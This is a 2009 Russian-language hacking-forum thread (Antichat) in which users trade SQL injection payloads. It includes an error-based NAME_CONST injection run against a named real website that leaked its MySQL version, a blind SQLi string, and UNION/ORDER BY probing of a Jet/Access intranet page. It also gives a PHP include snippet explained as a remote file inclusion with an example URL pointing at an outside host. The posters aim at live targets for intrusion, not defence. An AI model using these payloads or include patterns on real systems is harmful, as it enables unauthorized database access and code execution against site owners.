
09.11.2009, 19:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от mailbrush
Умно  5*5/5 
/add аа блин, первый вариант тоже правильный), напрасная параноя с 6/5
все таки лучше так
http://wmkopilka.ru/coinbox.php?5240'+version()-'5 = http://wmkopilka.ru/coinbox.php?5240
Последний раз редактировалось l1ght; 09.11.2009 в 20:15..
|
|
|

09.11.2009, 17:49
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
А можно и вывод сделать:
Код:
http://wmkopilka.ru/coinbox.php?5240'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name '5.0.67'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
Для кого человек старался? Почему не используете? 
__________________
включи голову
|
|
|

09.11.2009, 19:18
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
<?php
if (isset($_GET['q'])){
include("http://www.site.ru/?q=".$_GET['q'].".php");
}
?>
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?
Я вот хотел узнать к чему можно "подцепиться"  ) чтоб дальше узнать что делать.
Нет так сказать "универсальные" трюки для уловки SQL инекци ?
|
|
|

09.11.2009, 19:38
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от B1t.exe
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?
Я вот хотел узнать к чему можно "подцепиться"  ) чтоб дальше узнать что делать.
Нет так сказать "универсальные" трюки для уловки SQL инекци ?
Какой SQL inj ?
Здесь базой данных то и не пахнет.
У тебя есть инклайд.
PHP код:
<?php
if (isset($_GET['q'])){
include($_GET['q'].".php");
}
?>
ты получишь RFI (Remote File Include):
site.com/script.php?q=http://site.net/file
рузумееться при сообтетствующей конфигурации WEB сервера.
А именно - для RFI должен быть включен allow_url_include в php.ini
Так же можно юзать как и лфи.
Советую почитать статью задохлика:
http://forum.antichat.ru/thread23501.html
Последний раз редактировалось Ins3t; 09.11.2009 в 19:42..
|
|
|

09.11.2009, 22:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
на днях первый раз в жизни столкнулся со следующим адресом:
www.site.com/default.php?show=100 +and+ascii(lower(substring(version(),1,1)))=51
Можете объяснить или дать что либо почитать, что, в какой версии и вообще где применяется
......+and+ascii(lower(substring(version(),1,1)))= 51
|
|
|

09.11.2009, 22:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Кури Blind SQL inj
http://forum.antichat.ru/thread19844.html
Затем прочти пару статей от електа на тему реализации more1row инъецкий.
Так же говорять что Qwazar очень хорошо описал какую то новую технотогию, точно не скажу, сам еще не читал эту статью.
Последний раз редактировалось Ins3t; 09.11.2009 в 22:24..
|
|
|

09.11.2009, 22:42
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
можеть кто знает в Jet database error
на запрос:
выдает:
Код:
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '6' as a valid field name or expression.
а на:
=-1+order+by+4%00
страница открывается, но на нем тоже
Код:
Latest News
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '4' as a valid field name or expression.
/intranet/inx/ecom_engine.asp, line 2462
на запрос:
Код:
=-1+union+select+1,2,3,4%00
Код:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/intranet/inx/ecom_engine.asp, line 2462
как обойти? Правда ни одного названия таблиц не знаю.
Может есть новые статьи по Jet database
|
|
|

09.11.2009, 23:06
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Это Access. Статья:
http://forum.antichat.ru/thread50550.html
|
|
|

10.11.2009, 01:48
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от jokester
Это Access. Статья:
http://forum.antichat.ru/thread50550.html
спс но я это много раз прочитал, я имел ввиду новые обходы по этому обстоятельству
|
|
|

10.11.2009, 00:02
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Кстати, читаю про PHP inject (include), мне даже очень интересно кажется  ) спасибо за направление !
Кстати, хотел узнать тенденцию этого уязвимости.. т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|